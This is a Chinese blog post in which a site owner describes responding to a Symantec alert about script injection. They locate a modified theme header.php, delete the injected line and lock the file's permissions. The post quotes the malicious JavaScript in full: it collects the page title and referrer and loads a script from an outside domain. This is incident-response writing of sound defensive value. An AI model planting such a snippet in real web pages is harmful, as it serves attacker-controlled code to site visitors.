• 欢迎访问癹冬阁,本站专注于IT服务,记录工作点滴

SEP提示Mass Injection Website 19处理

开源世界 Winter 3年前 (2016-01-28) 1285次浏览 已收录 0个评论

今天访问自己网站时 SEP 提示[SID: 28821] 已禁止 Web Attack: Mass Injection Website 19 攻击。 已禁止此应用程序的通信: C:PROGRAM FILES (X86)MOZILLA FIREFOXFIREFOX.EXE,然后就禁止访问网站,客户端将禁止来自 IP 地址 x.x.x.x 的通信 (于接下来的 600 秒,即从 2016/1/28 9:15:24 到 2016/1/28 9:25:24)。

到 SEP 管理查询了下相关的信息,说是脚本注入

https://www.symantec.com/security_response/attacksignatures/detail.jsp?asid=28821

然后登陆到 VPS 上检查最近被修改的文件

find -ctime -1 检查最近 1 天被修改的文件

发现除了 cache 和 sitemap 之外只有一个主题下的 header.php 文件被修改。

打开这个文件和之前备份对比,发现在每个</head>之前都被加了一行代码

<script>var a=''; setTimeout(10); var default_keyword = encodeURIComponent(document.title); var se_referrer = encodeURIComponent(document.referrer); var host = encodeURIComponent(window.location.host); var base = "http://theclassicalfourplus1.com/js/jquery.min.php"; var n_url = base + "?default_keyword=" + default_keyword + "&se_referrer=" + se_referrer + "&source=" + host; var f_url = base + "?c_utt=snt2014&c_utm=" + encodeURIComponent(n_url); if (default_keyword !== null && default_keyword !== '' && se_referrer !== null && se_referrer !== ''){document.write('<script type="text/javascript" src="' + f_url + '">' + '<' + '/script>');}</script>

删除这行代码,并将 header.php 文件权限设定为 444。

至于问题基本解决。


癹冬阁版权所有丨如未注明 , 均为原创丨本网站采用BY-NC-SA协议进行授权 , 转载请注明SEP 提示 Mass Injection Website 19 处理
喜欢 (0)
[winters@8win.net]
分享 (0)
发表我的评论
取消评论

表情 贴图 加粗 删除线 居中 斜体 签到

Hi,您需要填写昵称和邮箱!

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址